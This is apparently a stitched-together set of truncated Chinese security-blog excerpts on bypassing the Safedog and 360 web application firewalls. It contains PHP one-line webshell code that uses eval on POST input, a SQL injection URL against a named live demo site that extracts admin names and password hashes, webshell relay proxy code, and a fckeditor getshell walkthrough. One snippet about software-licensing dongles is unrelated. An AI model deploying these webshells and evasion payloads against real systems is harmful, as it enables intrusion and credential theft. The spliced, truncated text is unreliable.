00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell.当然,安全狗是最简单的一款waf,很容易就进行一个绕过.00x02对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种 1.#可变变量2.#引用变量 00x03##可变变量(菜刀可能报错)<@eval($_POST['x'])复制代码 经常使用的人都知道,只是最简单的一句话,不过任何waf与规则我们先来加入需要的函数<?php$a='b';$b=$_POST['x'];@eval…
hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx 本文作者:i春秋签约作家——凉风 引用i春秋作家团大佬@非主流  对一句话木马的理解: 一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面. 目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02:正式开始:从过狗菜刀配置文件里寻找思路0×03:再写一个:分析各种拦截机制,一一绕过0×04:总结 0×01:…
绕过安全狗sql注入 http://demo.74cms.com/plus/ajax_common.php?act=hotwordquery=錦union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢 然后提交 http://demo.7 被拦截了,经过测试拦截的是select,那么把s…
本文作者:i春秋签约作家——酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 下面我们构造一个asp目录,如: http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp…
前言 在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php.某大佬提示并分享资源后,打算使用python完成中转.部分代码无耻copy. 客户端 本地127.0.0.1,安装python2phpshellproxy.py #coding=utf-8 import sys reload(sys) sys.setdefaultencoding('utf-8') import web urls = ( '/','index', '/reverse','reverse', ) #re…
前言 听说中国菜刀里有后门.抓包我是没有监测到异常数据包.为了以防万一,且更好使用中国菜刀硬杠安全狗.笔者收集了一下资料.无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗.原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shell,shell接收后用同样的算法进行解密,执行命令. 客户端 本地127.0.0.1,安装phpstudytransfer.php <?php function en…
1.什么是SQL注入攻击 SQL注入攻击指的是通过构造特殊的输入作为参数插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 http://www.xxx.com/list.php?id=1 http://www.xxx.com/list.php?id=1 and user()>0 -- [ ] 哪里存在sql注入 GET,POST,HTTP头部注入,Cookie注入,任何客户端可控,传递到服务器的变量 [ ]漏洞原理 程序编写者在处理程序和数据库交互时,使用字符串拼接…
由于业务中最近需要使用到加密狗,增加对Web代码的管控,所以需要进行加密狗使用的研究 首先,对于没有接触使用过加密狗的人需要有个大致的认识,加密狗分为 MasterDog, 1.下载加密狗的开发套件,这个一般购买加密狗厂商会提供 (safenetftp%5Csuperdog%5CSuperDog-R-2.3.1.56436.iso) 安装完成之后会在看到如上图的一个菜单项 2.代码集成加密狗 代码中集成加密狗,使用中将加密狗集成到了过滤器中,针对请求检查加密狗的状态,加密狗提供了.net的开发s…
转载请加原文链接:https://www.cnblogs.com/Yang34/p/12055052.html 微信公众号:信Yang安全.同步更新,欢迎关注.文末有二维码. 正好最近在搞注入,昨天现装的安全狗练练手,搭建环境如下图:…
CDN       负载均衡.内容分发 解析漏洞一般在服务层      二进制,溢出,提权在系统层         渗透测试就是以上全部层 协议未正确解析 GET改POST   这叫参数污染 cookie    改一个较大的值     有的waf承受不了这么大的值,参数污染 HTTP参数污染  HPP参数污染     使用多个无用值或者重复值提交到数据包中达到攻击 提交两个filename值,这要看具体什么服务器,两个一样的参数是哪一个参数生效 waf有正则匹配拦截,我们要找到拦截点在哪里.绕过…